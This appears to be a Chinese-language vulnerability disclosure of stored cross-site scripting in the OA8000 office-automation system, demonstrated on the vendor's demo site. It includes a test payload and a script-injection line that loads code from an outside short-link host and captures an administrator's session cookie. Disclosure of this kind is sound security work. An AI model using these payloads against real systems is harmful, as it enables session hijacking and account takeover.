VULHUB ™

### 简要描述： 缺个移动硬盘存片子 ### 详细说明： 上次提交说是self-xss，为了证明不是self-xss，这次打一下管理cookie吧 demo演示，涉及大量政府，医院，房产，电视台等网站：http://www.oa8000.com/solution.htm [<img src="https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png) [<img src="https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png) [<img src="https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png) 首先还是来到官网，看到demo演示地址：http://demo.oa8000.com [<img...

### 简要描述： 缺个移动硬盘存片子 ### 详细说明： 上次提交说是self-xss，为了证明不是self-xss，这次打一下管理cookie吧 demo演示，涉及大量政府，医院，房产，电视台等网站：http://www.oa8000.com/solution.htm [<img src="https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009460331f8b433af24f5952f5cc08273896a49.png) [<img src="https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946166250acdac6c6538176200bb4b056003d.png) [<img src="https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946238ae6b3b0729ff4a860ae1a5dfa9205bc.png) 首先还是来到官网，看到demo演示地址：http://demo.oa8000.com [<img src="https://images.seebug.org/upload/201501/2009463643258959475cefe67358bd8f10de9724.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009463643258959475cefe67358bd8f10de9724.png) 然后先用官方提供的普通用户登录 [<img src="https://images.seebug.org/upload/201501/200946439e59f677d944e36a158bb6e4fcbd4596.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200946439e59f677d944e36a158bb6e4fcbd4596.png) 存在XSS的地方在：客户管理--我的客户--新建 [<img src="https://images.seebug.org/upload/201501/20094652d6bd37746b4859c7dbea7055f5ba9abb.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20094652d6bd37746b4859c7dbea7055f5ba9abb.png) 这里新建一个客户，然后盲插一下= =：`"/><svg onload=alert(/1/)>` [<img src="https://images.seebug.org/upload/201501/200947009a016b4fe343cbf21135559eda89c5cc.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200947009a016b4fe343cbf21135559eda89c5cc.png) 保存后返回直接弹窗，本来以为就客户名称那里可以触发，没想到直接弹了4处= = [<img src="https://images.seebug.org/upload/201501/200947099bc4ab685780f9e7d2a461179469cb2d.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200947099bc4ab685780f9e7d2a461179469cb2d.png) 然后再点击进去查看一下，一共11处，均未做任何处理= = [<img src="https://images.seebug.org/upload/201501/20094720b7f835477e23481c6e882d6d0223e80b.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20094720b7f835477e23481c6e882d6d0223e80b.png) [<img src="https://images.seebug.org/upload/201501/20094731678f31c844c2499c3f737fd9d15a9173.png" alt="10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20094731678f31c844c2499c3f737fd9d15a9173.png) 接下来登录官方提供的管理员账号查看，成功弹窗 [<img src="https://images.seebug.org/upload/201501/200947482ae98228cb2b676e2740043614f73e6a.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200947482ae98228cb2b676e2740043614f73e6a.png) 然后返回普通用户后继续构造：`"/><script src=http://t.cn/RZW9FpT></script>`，这里是测试打cookie所以只插入一处XSS [<img src="https://images.seebug.org/upload/201501/200958211bebe6628519a1411fff942bc712218e.png" alt="12.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200958211bebe6628519a1411fff942bc712218e.png) 然后登录管理账号查看 [<img src="https://images.seebug.org/upload/201501/200959029380639348d3c2c5ff193ea1ee5a65b4.png" alt="13.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/200959029380639348d3c2c5ff193ea1ee5a65b4.png) 来到收信平台后查看，cookie已经成功打到~ [<img src="https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png" alt="14.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png" alt="14.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2009583016838549c4f6e520e58a25b0ebf2b85e.png)